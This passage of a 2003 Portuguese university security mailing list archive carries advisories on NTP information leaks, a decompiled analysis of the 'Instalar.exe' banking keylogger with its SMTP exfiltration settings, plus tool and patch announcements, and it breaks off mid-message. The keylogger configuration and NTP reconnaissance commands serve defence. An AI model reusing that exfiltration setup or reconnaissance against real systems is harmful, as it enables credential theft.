Jun 2003 17:58:45 -0300 Caros, A informacao a seguir nao e' nenhuma novidade, mas vale a pena ser relembrada. E' trivial para um atacante colher remotamente informacoes sobre versao de ntpd, arquitetura e sistema operacional (muitas vezes com versao) apenas rodando o comando ntpq e realizando queries do tipo NTP mode 6 e mode 7 a um servidor NTP. Depende da politica de seguranca de cada instituicao permitir que essas informacoes saiam da sua rede, quer seja via NTP ou outro metodo. Acho importante, entretanto, que todos estejam a par do tipo de informacao que pode ser fornecida, especialmente instituicoes que mantem servidores de NTP publicos. Seria interessantes que os participantes da lista verificassem se os servidores NTP das suas instituicoes estao revelando mais informacoes do que o permitido pelas suas politicas de seguranca e/ou bom senso. Um detalhe: para que um atacante colha as informacoes nao e' necessario que a maquina sirva tempo -- dependendo de como estiver configurada pode rodar ntpd apenas como cliente e mesmo assim fornecer essas informacoes. Exemplos das informacoes fornecidas sao mostradas abaixo: (algumas linhas foram omitidas por brevidade e os hostnames sanitizados) ====================================================================== $ ntpq -c cv -c rl machine version="ntpd 4.1.0-a Sat Jun 7 15:26:48 BRT 2003 (1)", processor="i386", system="FreeBSD4.8-STABLE" ====================================================================== $ ntpq -c cv -c rl machine version="ntpd 4.0.99m-rc2 Tue Jun 26 17:27:59 EST 2001 (1)", processor="i386", system="OpenBSD2.8" ====================================================================== $ ntpq -c cv -c rl machine system="OpenVMS AXP" ====================================================================== $ ntpq -c cv -c rl machine version="ntpd 4.0.99k23 Sun Apr 8 01:40:30 EDT 2001 (4)", processor="sun4m", system="SunOS5.5.1" ====================================================================== $ ntpq -c cv -c rl machine version="ntpd 4.1.1 em 1.786 Fri Apr 25 16:25:22 BRT 2003 (1)", processor="i686", system="Linux2.4.18" ====================================================================== Na configuracao do ntpd e' possivel restringir esse tipo de query (mode 6 e mode 7), sem afetar o servico de tempo, por exemplo, com: restrict default noquery Essa solucao, entretanto, restringe outras queries que podem ser uteis para clientes determinarem a qualidade de tempo servido por um dado servidor ntp. Outra solucao e' recompilar o ntpd com um patch para sanitizar as informacoes sensiveis de sistema. No final deste mail segue um patch desenvolvido pelo Frederico Neves, do registro.br, com este fim. Sintam-se a vontade para usar e mesmo repassar esse patch, desde que o autor original seja mencionado. E' possivel que pequenas modificacoes ao patch sejam necessarias, dependendo da versao de ntpd utilizada. Apos a aplicacao do patch, a saida passa a ser, por exemplo: $ ntpq -c cv -c rl machine version="ntpd", processor="x86", system="Unix" Abracos, Klaus. NIC BR Security Office http://www.nbso.nic.br/ *** /usr/src/contrib/ntp/ntpd/ntp_control.c.orig Tue Dec 3 16:14:43 2002 --- /usr/src/contrib/ntp/ntpd/ntp_control.c Tue Dec 3 16:25:41 2002 *************** *** 1245,1251 **** sizeof(str_processor) - 1); #else ctl_putstr(sys_var[CS_PROCESSOR].text, ! utsnamebuf.machine, strlen(utsnamebuf.machine)); #endif /* HAVE_UNAME */ break; --- 1245,1251 ---- sizeof(str_processor) - 1); #else ctl_putstr(sys_var[CS_PROCESSOR].text, ! "x86", strlen("x86")); #endif /* HAVE_UNAME */ break; *************** *** 1254,1268 **** ctl_putstr(sys_var[CS_SYSTEM].text, str_system, sizeof(str_system) - 1); #else ! (void)strcpy(str, utsnamebuf.sysname); ! (void)strcat(str, utsnamebuf.release); ctl_putstr(sys_var[CS_SYSTEM].text, str, strlen(str)); #endif /* HAVE_UNAME */ break; case CS_VERSION: ! ctl_putstr(sys_var[CS_VERSION].text, Version, ! strlen(Version)); break; case CS_STABIL: --- 1254,1267 ---- ctl_putstr(sys_var[CS_SYSTEM].text, str_system, sizeof(str_system) - 1); #else ! (void)strcpy(str, "Unix"); ctl_putstr(sys_var[CS_SYSTEM].text, str, strlen(str)); #endif /* HAVE_UNAME */ break; case CS_VERSION: ! ctl_putstr(sys_var[CS_VERSION].text, "ntpd", ! strlen("ntpd")); break; case CS_STABIL: ----- End forwarded message ----- From daniela em ccuec.unicamp.br Mon Jun 16 10:54:31 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Mon, 16 Jun 2003 10:54:31 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20030616135430.GA612@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 12/06/2003 ---------- Debian Security Advisory (DSA 318-1) Assunto: vulnerabilidade de seguranca no pacote lyskom-server. http://www.security.unicamp.br/docs/bugs/2003/06/v29.txt Debian Security Advisory (DSA 319-1) Assunto: vulnerabilidade de seguranca no pacote webmin. http://www.security.unicamp.br/docs/bugs/2003/06/v30.txt 13/06/2003 ---------- SuSE Security Announcement (SuSE-SA:2003:030) Assunto: vulnerabilidade de seguranca no pacote radiusd-cistron. http://www.security.unicamp.br/docs/bugs/2003/06/v31.txt Debian Security Advisory (DSA 320-1) Assunto: vulnerabilidade de seguranca no pacote mikmod. http://www.security.unicamp.br/docs/bugs/2003/06/v32.txt Debian Security Advisory (DSA 321-1) Assunto: vulnerabilidade de seguranca no pacote radiusd-cistron. http://www.security.unicamp.br/docs/bugs/2003/06/v33.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Tue Jun 17 13:50:54 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Tue, 17 Jun 2003 13:50:54 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20030617165054.GA2621@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 16/06/2003 ---------- Anuncio de Seguranca do Conectiva Linux (CLA-2003:660) Assunto: Problema com consultas a base de dados rpm. http://www.security.unicamp.br/docs/bugs/2003/06/v34.txt Anuncio de Seguranca do Conectiva Linux (CLA-2003:661) Assunto: Vulnerabilidade no servidor Apache 2. http://www.security.unicamp.br/docs/bugs/2003/06/v35.txt Mandrake Linux Security Update Advisory (MDKSA-2003:067) Assunto: vulnerabilidade de seguranca no pacote ethereal. http://www.security.unicamp.br/docs/bugs/2003/06/v36.txt Mandrake Linux Security Update Advisory (MDKSA-2003:068) Assunto: vulnerabilidade de seguranca no pacote gzip. http://www.security.unicamp.br/docs/bugs/2003/06/v37.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Tue Jun 17 14:27:01 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Tue, 17 Jun 2003 14:27:01 -0300 Subject: [SECURITY-L] Boletins de noticias Message-ID: <20030617172700.GA2695@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e redes da Unicamp com os seguintes boletins de noticia e/ou revistas eletronicas: 16/06/2003 ---------- SecurityFocus Newsletter #201 Fonte: SecurityFocus.com http://www.security.unicamp.br/docs/informativos/2003/06/b8.txt SANS Critical Vulnerability Analysis Vol 2 No 23 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2003/06/b9.txt Módulo Security News no.297 Fonte: Módulo Security Solutions S/A http://www.security.unicamp.br/docs/informativos/2003/06/b10.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Wed Jun 18 09:29:18 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Wed, 18 Jun 2003 09:29:18 -0300 Subject: [SECURITY-L] Artefato Instalar.exe BBB4 Message-ID: <20030618122918.GC3812@ccuec.unicamp.br> Pessoal, Vem crescendo o numero de programas "keylogger" que estao circulando pela rede. Depois de instalado na maquina do usuario tudo o que e' digitado e' capturado. A intencao e' obter senhas de bancos e/ou outros sistemas que envolvam senhas. Vale alertar, novamente, os usuarios sobre arquivos attachados. Daniela ----- Forwarded message from Jarbas de Freitas Peixoto ----- From: "Jarbas de Freitas Peixoto" Subject: [GTS-L] Artefato Instalar.exe BBB4 To: gts-l em listas.unesp.br Date: Tue, 17 Jun 2003 20:54:48 -0300 X-mailer: Pegasus Mail for Windows (v4.11) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Senhores, Ultimamente, o Laboratório ACME! tem recebido muitas perguntas a respeito de um "artefato malicioso" chamado Instalar.exe, que usualmente chega até você por email "SPAM" uma página chamada "Big Brother Brasil 4 FAÇAM SUAS INSCRIÇÕES!!!". Assunto já discutido nessa calorosa lista. - ------- Análise publicada em https://forum.acmesecurity.org/viewtopic.php?t=360 - ------- O programa Instalar.exe visa capturar informações de senhas de usuários de bancos e outros sistemas que envolvam senhas. Algumas evidências encontradas: O programa Instalar.exe (md5sum - 6f12e67d792b30bfb9ca74e055be105e) é na verdade um instalador (self-extractor) do artefato própriamente dito Msdosdll.exe (made in Delphi). O conteúdo do instalador é: b8d289aabcbcb16d9393fedf28c0fb65 *file.bck dc302596bc79a15836cc54f79d932b4f *Ios.EXE 5baebb99bcefbb1c8292da6bb7843b37 *KeyChar.dll 5cea960368d9b223571851d064138071 *kt_dll.dll 81051bcc2cf1bedf378224b0a93e2877 *list.txt 3fa05f86bfa4e28bcd67ea55d8e6a12b *Msdosdll.exe 285b1db9b0b8afb1aaee84205843d42d *MsdosDll.INI 81051bcc2cf1bedf378224b0a93e2877 *winsee32.ver A função do artefato Msdosdll.exe é muito parecida com a do Msnbc32.exe (outro artefato Certificado_digital.exe em https://forum.acmesecurity.org/viewtopic.php?t=348 ) Dentro do programa Msdosdll.exe foi encontrada várias strings com nomes de bancos e funções para capturar os pressionamentos de teclas do usuário. Fazendo análise do arquivo Ios.exe observa-se para onde estão sendo enviados os pressionamentos. "Descompilando" o arquivo Ios.exe observamos: .... cortes para fim de brevidade .... end object Sm: TNMSMTP Host = 'smtp.terra.com.br' Port = 25 TimeOut = 800000 ReportLevel = 0 UserID = 'Jose manoel' PostMessage.FromAddress = 'caixa.linck10 em terra.com.br' PostMessage.FromName = 'spider' PostMessage.ToAddress.Strings = ( 'caixa.linck10 em terra.com.br') PostMessage.ToBlindCarbonCopy.Strings = ( '') PostMessage.Attachments.Strings = ( 'c:\windows\system\file.bck') PostMessage.Subject = 'Big_Virtual' PostMessage.LocalProgram = 'c:\windows\system' EncodeType = uuMime ClearParams = True SubType = mtPlain Charset = 'us-ascii' Left = 80 Top = 64 end object bc: TBackupFile Version = '5.10' BackupMode = bmAll CompressionLevel = clFastest RestoreMode = rmAll MaxSize = 0 SetArchiveFlag = False RestoreFullPath = False SaveFileID = False Left = 80 Top = 32 end object sm1: TNMSMTP Host = 'smtp.uol.com.br' Port = 25 TimeOut = 800000 ReportLevel = 0 UserID = 'Jose manoel' PostMessage.FromAddress = 'w9z em uol.com.br' PostMessage.FromName = 'spider' PostMessage.ToAddress.Strings = ( 'w9zw9z em uol.com.br') PostMessage.ToBlindCarbonCopy.Strings = ( '') PostMessage.Attachments.Strings = ( 'c:\windows\system\file.bck') PostMessage.Subject = 'Our_2_Virtual' PostMessage.LocalProgram = 'c:\windows\system' EncodeType = uuMime ClearParams = True SubType = mtPlain Charset = 'us-ascii' Left = 20 Top = 6 end end Há também variação do instalador (instalar.exe) md5sum - 196f712158d23211309a300133073614 *Instalar.exe Conteúdo da variação: b8d289aabcbcb16d9393fedf28c0fb65 *file.bck 8206c564be094697ceeb2b664b2cd097 *Ios.EXE << mudança 5baebb99bcefbb1c8292da6bb7843b37 *KeyChar.dll 5cea960368d9b223571851d064138071 *kt_dll.dll 81051bcc2cf1bedf378224b0a93e2877 *list.txt 3fa05f86bfa4e28bcd67ea55d8e6a12b *Msdosdll.exe 285b1db9b0b8afb1aaee84205843d42d *MsdosDll.INI 81051bcc2cf1bedf378224b0a93e2877 *winsee32.ver Observando essa variação constatou-se que a mudança é apenas no arquivo Ios.exe - arquivo que contém os emails para onde deverão ser enviados os pressionamentos de teclas. Descompilando e análisando Ios.exe da variação constatamos a mudança do email do destinatário: .... cortes para fim de brevidade .... object Sm: TNMSMTP Host = 'smtp.terra.com.br' Port = 25 TimeOut = 800000 ReportLevel = 0 UserID = 'Jose manoel' PostMessage.FromAddress = 'progtelecom.1 em terra.com.br' PostMessage.FromName = 'spider' PostMessage.ToAddress.Strings = ( 'progtelecom.1 em terra.com.br') PostMessage.ToBlindCarbonCopy.Strings = ( '') PostMessage.Attachments.Strings = ( 'c:\windows\system\file.bck') PostMessage.Subject = 'Big_Virtual' PostMessage.LocalProgram = 'c:\windows\system' EncodeType = uuMime ClearParams = True SubType = mtPlain Charset = 'us-ascii' Left = 80 Top = 64 end object bc: TBackupFile Version = '5.10' BackupMode = bmAll CompressionLevel = clFastest RestoreMode = rmAll MaxSize = 0 SetArchiveFlag = False RestoreFullPath = False SaveFileID = False Left = 80 Top = 32 end object sm1: TNMSMTP Host = 'smtp.uol.com.br' Port = 25 TimeOut = 800000 ReportLevel = 0 UserID = 'Jose manoel' PostMessage.FromAddress = 'w9z em uol.com.br' PostMessage.FromName = 'spider' PostMessage.ToAddress.Strings = ( 'ispont em uol.com.br') PostMessage.ToBlindCarbonCopy.Strings = ( '') PostMessage.Attachments.Strings = ( 'c:\windows\system\file.bck') PostMessage.Subject = 'Our_2_Virtual' PostMessage.LocalProgram = 'c:\windows\system' EncodeType = uuMime ClearParams = True SubType = mtPlain Charset = 'us-ascii' Left = 20 Top = 6 end end - ----------- Perguntas freqüentes: - - Como minha máquina é infectada? Na verdade, não se trata de um vírus ou worn que "infecta". Trata-se de um "keylogger" (capturador de pressionamentos) e ao clicar em instalar.exe você estará instalando, ou seja, copiando os arquivos Msdosdll.exe, keychar.dll, Msdosdll.exe, Msdosdll.INI, winsee32.ver e file.bck para o seu sistema fazendo as entradas no registro para que ele execute automaticamente. - - Como saber se o keylogger está na minha máquina? Faça uma busca por Msdosdll.exe, keychar.dll, Msdosdll.exe, Msdosdll.INI, winsee32.ver e file.bck ... ou olhe em C:\...\... e procure esses arquivos. :-/ {PRIVATE "TYPE=PICT;ALT=icon_rolleyes.gif"} - - Como resolver? Remover esses arquivos (inclusive suas entradas no registro) ou mais "garantido" reinstalar o equipamento comprometido. - --------- Até mais, Jarbs ============================= Jarbas de Freitas Peixoto jarbas em acmesecurity.org ACME! Computer Security Research UNESP - São José do Rio Preto - SP ============================= -----BEGIN PGP SIGNATURE----- Version: idw's PGP-Frontend 4.9.4 / 5-2003 + PGP 8.0.0 iQA/AwUBPu+qS3xi97baZwFkEQIFbwCggnvnzGw0vkI7IvEKPthQAFPGPZEAn396 ujKB3xs3vKodqdTCvtkhXnBr =dTD8 -----END PGP SIGNATURE----- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Wed Jun 18 10:43:06 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Wed, 18 Jun 2003 10:43:06 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20030618134306.GA4054@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 16/06/2003 ---------- Debian Security Advisory (DSA 322-1) Assunto: vulnerabilidade de seguranca no pacote typespeed. http://www.security.unicamp.br/docs/bugs/2003/06/v38.txt Debian Security Advisory (DSA 323-1) Assunto: vulnerabilidade de seguranca no pacote noweb. http://www.security.unicamp.br/docs/bugs/2003/06/v39.txt Slackware Security Advisory (SSA:2003-168-01) Assunto: 2.4.21 kernels available. http://www.security.unicamp.br/docs/bugs/2003/06/v40.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Tue Jun 24 09:06:49 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Tue, 24 Jun 2003 09:06:49 -0300 Subject: [SECURITY-L] The Next Step in the Spam Control War: Greylisting Message-ID: <20030624120648.GB2177@ccuec.unicamp.br> ----- Forwarded message from Rafael R Obelheiro ----- From: Rafael R Obelheiro Subject: [S] The Next Step in the Spam Control War: Greylisting To: seguranca em pangeia.com.br Date: Fri, 20 Jun 2003 22:15:48 -0300 [http://projects.puremagic.com/greylisting/] The Next Step in the Spam Control War: Greylisting By Evan Harris Copyright 2003, all rights reserved. Introduction This paper proposes a new and currently very effective method of enhancing the abilities of mail systems to limit the amount of spam that they recieve and deliver to their users. For the purposes of this paper, we will call this new method "Greylisting". The reason for choosing this name should become obvious as we progress. Greylisting has been designed from the start to satisfy certain criteria: 1. Have minimal impact on users 2. Limit spammers ability to circumvent the blocking 3. Require minimal maintenance at both the user and administrator level User-level spam blocking, while somewhat effective has a few key drawbacks that make its use in the continuing spam war undesirable. A few of these are: 1. It provides no notice to the senders of legitimate email that is falsely identified as spam. 2. It places most of the costs of processing the spam on the receivers side rather than the spammers side. 3. It provides no real disincentive to spammers to stop wasting our time and resources. As a result, Greylisting is designed to be implemented at the MTA level, where we can cause the spammers the most amount of grief. For the purposes of evaluating and testing Greylisting, an example implementation has been written of a filter that runs at the MTA (Message Transfer Agent) level. The source for this example implementation is available as a link below, and as other implementations or additional utility code become available, they will also be linked. Greylisting has been tested on a few small scale mail hosts (less than 100 users, though with a fairly diverse set of senders from all over the world, and volumes over 10,000 email attempts a day), however it is designed to be scalable, as well as low impact to both administrators and users, and should be acceptable for use on a wide range of systems, including those of very large scale. Of course, performance issues are very dependent on implementation details. The Greylisting method proposed in this paper is a complimentary method to other existing and yet-to-be-designed spam control systems, and is not intended as a replacement for those other methods. In fact, it is expected that spammers will eventually try to minimise the effectiveness of this method of blocking, and Greylisting is designed to limit options available to the spammer when attempting to do so. The great thing about Greylisting is that the only methods of circumventing it will only make other spam control techniques just that much more effective (primarily DNS and other methods of blacklisting based on IP address) even after this adaptation by the spammers has occurred. [...] ----- End forwarded message ----- From daniela em ccuec.unicamp.br Tue Jun 24 09:07:10 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Tue, 24 Jun 2003 09:07:10 -0300 Subject: [SECURITY-L] Anuncio chkrootkit 0.41 Message-ID: <20030624120709.GC2177@ccuec.unicamp.br> ----- Forwarded message from Nelson Murilo ----- From: Nelson Murilo Subject: [S] [ Anuncio chkrootkit 0.41 ] To: seguranca em pangeia.com.br Date: Sat, 21 Jun 2003 00:23:40 -0300 chkrootkit 0.41 esta disponivel, etsa versao inclui: * chkproc.c - correcao para mecanismos NPTL threading; (obrigado a Michael Griego) - correcos menores; * chkrootkit novo teste: vdir - novos worm detectados - 55808.A Worm - TC2 Worm - novos rootkits detectados - Volc - Gold2 - Anonoying - Suckit (testes adicionais) - ZK (testes adicionais) - corecoes menores; chkrootkit is a tool to locally check for signs of a rootkit. More chkrootkit e' uma ferramenta que busca reconhecer localmente sinais de rootkits. Informacoes sobre chkrootkit e rootkits podem ser encontradas em: http://www.chkrootkit.org/. O pacote foi testado com sucesso nos seguntes sistemas: Linux 2.0.x, 2.2.x e 2.4.x (qq distribuicao), FreeBSD 2.2.x, 3.x e 4.x, OpenBSD 2.6, 2.7, 2.8, 2.9, 3.0, 3.1, 3.2 e 3.3, NetBSD 1.5.2, 1.6 e 1.6.1, Solaris 2.5.1, 2.6 and 8.0, HP-UX 11 and True64. o pacote e respectiva assinatura MD5 estao disponiveis em: * ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz * ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.md5 ou na pagina oficial: * http://www.chkrootkit.org/ Mais informacoes sobre rootkits podem ser encontradas em: * http://www.chkrootkit.org/index.html#related_links ./nelson -murilo ----- End forwarded message ----- From daniela em ccuec.unicamp.br Tue Jun 24 09:13:33 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Tue, 24 Jun 2003 09:13:33 -0300 Subject: [SECURITY-L] Honeyd 0.6: Happy Summer/Pre-Birthday Release Message-ID: <20030624121333.GD2177@ccuec.unicamp.br> ----- Forwarded message from Nelson Murilo ----- From: Nelson Murilo Subject: [S] Honeyd 0.6: Happy Summer/Pre-Birthday Release To: seguranca em pangeia.com.br Date: Mon, 23 Jun 2003 23:09:37 -0300 I am pleased to announce the latest release of Honeyd: HONEYD 0.6: HAPPY SUMMER/PRE-BIRTHDAY RELEASE: ---------------------------------------------- Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and their personality can be adapted so that they appear to be running certain operating systems. Honeyd provides a framework thats helps with many security problems. It can be instrumented to automatically detect worms, to provide network decoys to deter adversaries, threat detection and assessment, etc. Honeyd also helps with spam prevention and simple network simulations. Version 0.6 includes many feature improvements and bug fixes: ------------------------------------------------------------- Support for plugins that allow external developers to hook into the Honeyd packet stream. Thanks to Christian Kreibich. The routing code has been improved to scale to larger topologies using trinary tree code provided by Bill Cheswick. Support for asymmetric routes and GRE tunneling allowing distributed Honeyd installations and virtualization of dispersed topologies. External machines can be integrated into the virtual routing topology to create more realistic honeynets. This feature may also be used for network simulation by placing several machines at different ends of the topology and see how packets are affected by packet loss, etc. Subsystems can be shared between different virtual hosts now to increase the performance on large networks. Many many bug fixes. More information on Honeyd can be found at http://www.citi.umich.edu/u/provos/honeyd/ Honeyd is released under a 4-clause BSD license. Please, check the GPG signature before installing Honeyd. It is recommended to run Honeyd under a sandbox like Systrace; see http://www.citi.umich.edu/u/provos/systrace/ Feedback and comments are welcome. Regards, Niels Provos. ----- End forwarded message ----- From daniela em ccuec.unicamp.br Tue Jun 24 09:06:01 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Tue, 24 Jun 2003 09:06:01 -0300 Subject: [SECURITY-L] [FreeBSD-Announce] FreeBSD 5.1 CDROMs / DVDs Message-ID: <20030624120600.GA2177@ccuec.unicamp.br> ----- Forwarded message from Robert Bruce ----- From: Robert Bruce Subject: [FreeBSD-Announce] FreeBSD 5.1 CDROMs / DVDs To: announce em FreeBSD.ORG Cc: rab em freebsdmall.com Date: Thu, 19 Jun 2003 00:18:51 -0700 FreeBSD Mall is happy to announce the availability of FreeBSD 5.1 CDROMs. Most of the USA subscriptions will ship today by either Priority Mail or Media Mail. USA residents should have their discs in the mail sometime early next week. International orders will ship on Friday or Saturday, and should arrive in about 7 to 10 days. If you have any questions about your subscription, please e-mail info em freebsdmall.com. If you are not currently a subscriber, you can order the four-disc set online at http://www.freebsdmall.com. The FreeBSD 5.1 DVDs are not available yet, but should be ready in about two weeks. You can pre-order a FreeBSD 5.1 DVD at http://www.freebsdmall.com/cgi-bin/fm/bsddvd5.1 In addition to CD and DVD products, we also have a large collection of FreeBSD shirts, hats, jackets, boxer shorts, stickers, case-plates, mugs, mouse pads, and other promotional materials. -bob _______________________________________________ freebsd-announce em freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-announce To unsubscribe, send any mail to "freebsd-announce-unsubscribe em freebsd.org" ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Jun 26 16:46:54 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 26 Jun 2003 16:46:54 -0300 Subject: [SECURITY-L] CAIS-Alerta: Vulnerabilidade no Windows Media Player 9 (819639) Message-ID: <20030626194653.GE285@ccuec.unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Vulnerabilidade no Windows Media Player 9 (819639) To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br Date: Thu, 26 Jun 2003 13:34:36 -0300 (BRT) -----BEGIN PGP SIGNED MESSAGE----- O CAIS está repassando o alerta divulgado pela Microsoft, Microsoft Security Bulletin MS03-021: Flaw In Windows Media Player May Allow Media Library Access (819639), que trata de uma vulnerabilidade identificada no Windows Media Player 9, capaz de permitir o acesso a informacoes da maquina atacada pelo atacante. Sistemas Afetados: . Microsoft Windows Media Player 9 Series Correções disponíveis: A correção consiste na aplicação dos patches recomendados pela Microsoft e disponíveis em: Windows Media Player 9 Series http://microsoft.com/downloads/details.aspx?FamilyId=36814221-8194-4492-BB29-94DB3D4CB682&displaylang=en Windows Media Player 9 Series on Windows Server 2003 http://microsoft.com/downloads/details.aspx?FamilyId=82CD6192-15D8-4E28-9B14-F9B78FF01D8A&displaylang=en Maiores informações: http://www.microsoft.com/technet/security/bulletin/ms03-021.asp Identificador do CVE: CAN-2003-0348 (http://cve.mitre.org) O CAIS recomenda aos administradores de plataformas Microsoft que mantenham seus sistemas e aplicativos sempre atualizados. Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA / RNP # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel em: http://www.cais.rnp.br/cais-pgp.key # ################################################################ - - ------------------------------------------------------------------ Title: Flaw In Windows Media Player May Allow Media Library Access (819639) Date: 25 June 2003 Software: Microsoft(r) Windows(r) Media Player 9 Series Impact: Information disclosure Max Risk: Moderate Bulletin: MS03-021 Microsoft encourages customers to review the Security Bulletins at: http://www.microsoft.com/technet/security/bulletin/MS03-021.asp http://www.microsoft.com/security/security_bulletins/ms03-021.asp - - ------------------------------------------------------------------ Issue: ====== An ActiveX control included with Windows Media Player 9 Series allows Web page authors to create Web pages that can play media and provide a user interface by which the user can control playback. When a user visits a Web page with embedded media, the ActiveX control provides a user interface that allows the user to take such actions as pausing or rewinding the media. A flaw exists in the way in which the ActiveX control provides access to information on the user's computer. A vulnerability exists because an attacker could invoke the ActiveX control from script code, which would allow the attacker to view and manipulate metadata contained in the media library on the user's computer. To exploit this flaw, an attacker would have to host a malicious Web site that contained a Web page designed to exploit this vulnerability, and then persuade a user to visit that site-an attacker would have no way to force a user to the site. An attacker could also embed a link to the malicious site in an HTML e-mail and send it to the user. After the user previewed or opened the e-mail, the malicious site could be visited automatically without further user interaction. The attacker would only have access to manipulate the media library on the user's computer. The attacker would not be able to browse the user's hard disk and would not have access to passwords or encrypted data. The attacker would not be able to modify files on the user's hard disk, but could modify the contents of any Media Library entries associated with those files. The attacker might also be able to determine the user name of the logged-on user by examining the directory paths to media files. Mitigating Factors: ==================== - By default, Internet Explorer on Windows Server 2003 runs in Enhanced Security Configuration. This default configuration of Internet Explorer blocks this attack. - The attacker could only gain access to information contained in the Windows Media Library - The attacker would not be able to execute code on the system or delete files on the user's hard disk. Risk Rating: ============ Moderate Patch Availability: =================== - A patch is available to fix this vulnerability. Please read the Security Bulletins at http://www.microsoft.com/technet/security/bulletin/ms03-021.asp http://www.microsoft.com/security/security_bulletins/ms03-021.asp for information on obtaining this patch. Acknowledgment: =============== - Jelmer (jelmer em kuperus.xs4all.nl) - - ------------------------------------------------------------------ THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. ******************************************************************* You have received this e-mail bulletin because of your subscription to the Microsoft Product Security Notification Service. For more information on this service, please visit http://www.microsoft.com/technet/security/notify.asp. To verify the digital signature on this bulletin, please download our PGP key at http://www.microsoft.com/technet/security/notify.asp. To unsubscribe from the Microsoft Security Notification Service, please visit the Microsoft Profile Center at http://register.microsoft.com/regsys/pic.asp If you do not wish to use Microsoft Passport, you can unsubscribe from the Microsoft Security Notification Service via email as described below: Reply to this message with the word UNSUBSCRIBE in the Subject line. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPvsgpOkli63F4U8VAQGP7wQAmf4QAlP01LovQefy5w1jWylQW+5EZiF1 5NSX+c9SPBcblXUxDo+je++T0M7BdWltukQyQnNBt18yw/zKUgC5mAnx1kxWUAqx Vn9lVeJOxwhJP9lLanYL5tWSm6QfiqNaJfYiC7fcikA5FW7oU6gTyivO2xzlvYv+ SRPviIAmewk= =JOJg -----END PGP SIGNATURE----- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Jun 26 16:47:24 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 26 Jun 2003 16:47:24 -0300 Subject: [SECURITY-L] CAIS-Alerta: Vulnerabilidade no ISAPI Extension do Windows Media Services (822343) Message-ID: <20030626194722.GF285@ccuec.unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Vulnerabilidade no ISAPI Extension do Windows Media Services (822343) To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br Date: Thu, 26 Jun 2003 13:35:11 -0300 (BRT) -----BEGIN PGP SIGNED MESSAGE----- Prezados, O CAIS está repassando o alerta divulgado pela Microsoft, Microsoft Security Bulletin MS03-022: Flaw 